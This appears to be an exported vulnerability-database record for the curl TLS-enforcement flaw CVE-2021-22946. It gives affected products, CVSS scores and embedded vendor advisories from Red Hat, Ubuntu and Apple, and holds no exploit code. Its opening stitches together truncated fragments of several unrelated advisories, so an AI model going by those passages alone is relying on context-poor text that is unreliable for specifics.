x86_64: curl-7.61.1-12.el8_2.4.x86_64.rpm curl-debuginfo-7.61.1-12.el8_2.4.i686.rpm curl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm curl-debugsource-7.61.1-12.el8_2.4.i686.rpm curl-debugsource-7.61.1-12.el8_2.4.x86_64.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm curl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm libcurl-7.61.1-12.el8_2.4.i686.rpm libcurl-7.61.1-12.el8_2.4.x86_64.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.i686.rpm libcurl-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm libcurl-devel-7.61.1-12.el8_2.4.i686.rpm libcurl-devel-7.61.1-12.el8_2.4.x86_64.rpm libcurl-minimal-7.61.1-12.el8_2.4.i686.rpm libcurl-minimal-7.61.1-12.el8_2.4.x86_64.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.i686.rpm libcurl-minimal-debuginfo-7.61.1-12.el8_2.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-22946 https://access.redhat.com/security/cve/CVE-2021-22947 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. ========================================================================== Ubuntu Security Notice USN-5079-3 September 21, 2021
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.04 LTS
Summary:
USN-5079-1 introduced a regression in curl. One of the fixes introduced a regression on Ubuntu 18.04 LTS. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that curl incorrect handled memory when sending data to an MQTT server. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2021-22945) Patrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946) Patrick Monnerat discovered that curl incorrectly handled responses received before STARTTLS. A remote attacker could possibly use this issue to inject responses and intercept communications. (CVE-2021-22947)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.16 libcurl3-gnutls 7.58.0-2ubuntu3.16 libcurl3-nss 7.58.0-2ubuntu3.16 libcurl4 7.58.0-2ubuntu3.16
In general, a standard system update will make all the necessary changes. Summary:
The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
- Solution:
For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html
For Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1858 - OpenShift Alerting Rules Style-Guide Compliance LOG-1917 - [release-5.1] Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
6
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "communications cloud native core service communication proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0.1.1"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.20.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.11.0"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.79.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.35"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.1"
},
{
"_id": null,
"model": "commerce guided search",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
}
],
"trust": 0.4
},
"cve": "CVE-2021-22946",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-22946",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-381420",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-22946",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22946",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-997",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-381420",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"description": {
"_id": null,
"data": "A user can tell curl \u003e= 7.20.0 and \u003c= 7.78.0 to require a successful upgrade to TLS when speaking to an IMAP, POP3 or FTP server (`--ssl-reqd` on the command line or`CURLOPT_USE_SSL` set to `CURLUSESSL_CONTROL` or `CURLUSESSL_ALL` withlibcurl). This requirement could be bypassed if the server would return a properly crafted but perfectly legitimate response.This flaw would then make curl silently continue its operations **withoutTLS** contrary to the instructions and expectations, exposing possibly sensitive data in clear text over the network. A security issue was found in curl prior to 7.79.0. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-03-14-4 macOS Monterey 12.3\n\nmacOS Monterey 12.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213183. \n\nAccelerate Framework\nAvailable for: macOS Monterey\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-22633: an anonymous researcher\n\nAMD\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-22669: an anonymous researcher\n\nAppKit\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to gain root privileges\nDescription: A logic issue was addressed with improved validation. \nCVE-2022-22665: Lockheed Martin Red Team\n\nAppleGraphicsControl\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-22631: an anonymous researcher\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted AppleScript binary may\nresult in unexpected application termination or disclosure of process\nmemory\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: An application may be able to read restricted memory\nDescription: This issue was addressed with improved checks. \nCVE-2022-22648: an anonymous researcher\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted AppleScript binary may\nresult in unexpected application termination or disclosure of process\nmemory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\nAppleScript\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\nBOM\nAvailable for: macOS Monterey\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper\nchecks\nDescription: This issue was addressed with improved checks. \nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley\n(@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.79.1. \nCVE-2021-22946\nCVE-2021-22947\nCVE-2021-22945\nCVE-2022-22623\n\nFaceTime\nAvailable for: macOS Monterey\nImpact: A user may send audio and video in a FaceTime call without\nknowing that they have done so\nDescription: This issue was addressed with improved checks. \nCVE-2022-22643: Sonali Luthar of the University of Virginia, Michael\nLiao of the University of Illinois at Urbana-Champaign, Rohan Pahwa\nof Rutgers University, and Bao Nguyen of the University of Florida\n\nImageIO\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2022-22611: Xingyu Jin of Google\n\nImageIO\nAvailable for: macOS Monterey\nImpact: Processing a maliciously crafted image may lead to heap\ncorruption\nDescription: A memory consumption issue was addressed with improved\nmemory handling. \nCVE-2022-22612: Xingyu Jin of Google\n\nIntel Graphics Driver\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba\nSecurity Pandora Lab\n\nIOGPUFamily\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-22641: Mohamed Ghannam (@_simo36)\n\nKernel\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-22613: Alex, an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-22614: an anonymous researcher\nCVE-2022-22615: an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to elevate privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-22632: Keegan Saunders\n\nKernel\nAvailable for: macOS Monterey\nImpact: An attacker in a privileged position may be able to perform a\ndenial of service attack\nDescription: A null pointer dereference was addressed with improved\nvalidation. \nCVE-2022-22638: derrek (@derrekr6)\n\nKernel\nAvailable for: macOS Monterey\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-22640: sqrtpwn\n\nlibarchive\nAvailable for: macOS Monterey\nImpact: Multiple issues in libarchive\nDescription: Multiple memory corruption issues existed in libarchive. \nThese issues were addressed with improved input validation. \nCVE-2021-36976\n\nLogin Window\nAvailable for: macOS Monterey\nImpact: A person with access to a Mac may be able to bypass Login\nWindow\nDescription: This issue was addressed with improved checks. \nCVE-2022-22647: an anonymous researcher\n\nLoginWindow\nAvailable for: macOS Monterey\nImpact: A local attacker may be able to view the previous logged in\nuser\u2019s desktop from the fast user switching screen\nDescription: An authentication issue was addressed with improved\nstate management. \nCVE-2022-22656\n\nGarageBand MIDI\nAvailable for: macOS Monterey\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: A memory initialization issue was addressed with\nimproved memory handling. \nCVE-2022-22657: Brandon Perry of Atredis Partners\n\nGarageBand MIDI\nAvailable for: macOS Monterey\nImpact: Opening a maliciously crafted file may lead to unexpected\napplication termination or arbitrary code execution\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2022-22664: Brandon Perry of Atredis Partners\n\nNSSpellChecker\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to access information\nabout a user\u0027s contacts\nDescription: A privacy issue existed in the handling of Contact\ncards. This was addressed with improved state management. \nCVE-2022-22644: an anonymous researcher\n\nPackageKit\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-22617: Mickey Jin (@patch1t)\n\nPreferences\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to read other\napplications\u0027 settings\nDescription: The issue was addressed with additional permissions\nchecks. \nCVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nQuickTime Player\nAvailable for: macOS Monterey\nImpact: A plug-in may be able to inherit the application\u0027s\npermissions and access user data\nDescription: This issue was addressed with improved checks. \nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nSafari Downloads\nAvailable for: macOS Monterey\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper\nchecks\nDescription: This issue was addressed with improved checks. \nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley\n(@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\nSandbox\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to bypass certain Privacy\npreferences\nDescription: The issue was addressed with improved permissions logic. \nCVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited,\nKhiem Tran\n\nSiri\nAvailable for: macOS Monterey\nImpact: A person with physical access to a device may be able to use\nSiri to obtain some location information from the lock screen\nDescription: A permissions issue was addressed with improved\nvalidation. \nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin,\nMcCombs School of Business (linkedin.com/andrew-goldberg/)\n\nSMB\nAvailable for: macOS Monterey\nImpact: A remote attacker may be able to cause unexpected system\ntermination or corrupt kernel memory\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-22651: Felix Poulin-Belanger\n\nSoftwareUpdate\nAvailable for: macOS Monterey\nImpact: An application may be able to gain elevated privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-22639: Mickey Jin (@patch1t)\n\nSystem Preferences\nAvailable for: macOS Monterey\nImpact: An app may be able to spoof system notifications and UI\nDescription: This issue was addressed with a new entitlement. \nCVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\nUIKit\nAvailable for: macOS Monterey\nImpact: A person with physical access to an iOS device may be able to\nsee sensitive information via keyboard suggestions\nDescription: This issue was addressed with improved checks. \nCVE-2022-22621: Joey Hewitt\n\nVim\nAvailable for: macOS Monterey\nImpact: Multiple issues in Vim\nDescription: Multiple issues were addressed by updating Vim. \nCVE-2021-4136\nCVE-2021-4166\nCVE-2021-4173\nCVE-2021-4187\nCVE-2021-4192\nCVE-2021-4193\nCVE-2021-46059\nCVE-2022-0128\nCVE-2022-0156\nCVE-2022-0158\n\nVoiceOver\nAvailable for: macOS Monterey\nImpact: A user may be able to view restricted content from the lock\nscreen\nDescription: A lock screen issue was addressed with improved state\nmanagement. \nCVE-2021-30918: an anonymous researcher\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A cookie management issue was addressed with improved\nstate management. \nWebKit Bugzilla: 232748\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to code\nexecution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 232812\nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 233172\nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\nWebKit Bugzilla: 234147\nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 234966\nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro\nZero Day Initiative\n\nWebKit\nAvailable for: macOS Monterey\nImpact: A malicious website may cause unexpected cross-origin\nbehavior\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 235294\nCVE-2022-22637: Tom McKee of Google\n\nWi-Fi\nAvailable for: macOS Monterey\nImpact: A malicious application may be able to leak sensitive user\ninformation\nDescription: A logic issue was addressed with improved restrictions. \nCVE-2022-22668: MrPhil17\n\nxar\nAvailable for: macOS Monterey\nImpact: A local user may be able to write arbitrary files\nDescription: A validation issue existed in the handling of symlinks. \nThis issue was addressed with improved validation of symlinks. \nCVE-2022-22582: Richard Warren of NCC Group\n\nAdditional recognition\n\nAirDrop\nWe would like to acknowledge Omar Espino (omespino.com), Ron Masas of\nBreakPoint.sh for their assistance. \n\nBluetooth\nWe would like to acknowledge an anonymous researcher, chenyuwang\n(@mzzzz__) of Tencent Security Xuanwu Lab for their assistance. \n\nFace Gallery\nWe would like to acknowledge Tian Zhang (@KhaosT) for their\nassistance. \n\nIntel Graphics Driver\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi\nWu (@3ndy1) for their assistance. \n\nLocal Authentication\nWe would like to acknowledge an anonymous researcher for their\nassistance. \n\nNotes\nWe would like to acknowledge Nathaniel Ekoniak of Ennate Technologies\nfor their assistance. \n\nPassword Manager\nWe would like to acknowledge Maximilian Golla (@m33x) of Max Planck\nInstitute for Security and Privacy (MPI-SP) for their assistance. \n\nSiri\nWe would like to acknowledge an anonymous researcher for their\nassistance. \n\nsyslog\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for\ntheir assistance. \n\nTCC\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive\nSecurity for their assistance. \n\nUIKit\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their\nassistance. \n\nWebKit\nWe would like to acknowledge Abdullah Md Shaleh for their assistance. \n\nWebKit Storage\nWe would like to acknowledge Martin Bajanik of FingerprintJS for\ntheir assistance. \n\nmacOS Monterey 12.3 may be obtained from the Mac App Store or Apple\u0027s\nSoftware Downloads web site: https://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmIv0O4ACgkQeC9qKD1p\nrhjGGRAAjqIyEzN+LAk+2uzHIMQNEwav9fqo/ZNoYAOzNgActK56PIC/PBM3SzHd\nLrGFKbBq/EMU4EqXT6ycB7/uZfaAZVCBDNo1qOoYNHXnKtGL2Z/96mV14qbSmRvC\njfg1pC0G1jPTxJKvHhuQSZHDGj+BI458fwuTY48kjCnzlWf9dKr2kdjUjE38X9RM\n0upKVKqY+oWdbn5jPwgZ408NOqzHrHDW1iIYd4v9UrKN3pfMGDzVZTr/offL6VFL\nosOVWv1IZvXrhPsrtd2KfG0hTHz71vShVZ7jGAsGEdC/mT79zwFbYuzBFy791xFa\nrizr/ZWGfWBSYy8O90d1l13lDlE739YPc/dt1mjcvP9FTnzMwBagy+6//zAVe0v/\nKZOjmvtK5sRvrQH54E8qTYitdMpY2aZhfT6D8tcl+98TjxTDNXXj/gypdCXNWqyB\nL1PtFhTjQ0WnzUNB7sosM0zAjfZ1iPAZq0XHDQ6p6gEdVavNOHo/ekgibVm5f1pi\nkwBHkKyq55QbzipDWwXl6Owk/iaHPxgENYb78BpeUQSFei+IYDUsyLkPh3L95PHZ\nJSyKOtbBArlYOWcxlYHn+hDK8iotA1c/SHDefYOoNkp1uP853Ge09eWq+zMzUwEo\nGXXJYMi1Q8gmJ9wK/A3d/FKY4FBZxpByUUgjYhiMKTU5cSeihaI=\n=RiA+\n-----END PGP SIGNATURE-----\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: curl security update\nAdvisory ID: RHSA-2022:0635-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0635\nIssue date: 2022-02-22\nCVE Names: CVE-2021-22946 CVE-2021-22947 \n=====================================================================\n\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 8.2\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: Requirement to use TLS not properly enforced for IMAP, POP3, and\nFTP protocols (CVE-2021-22946)\n\n* curl: Server responses received before STARTTLS processed after TLS\nhandshake (CVE-2021-22947)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux BaseOS EUS (v. 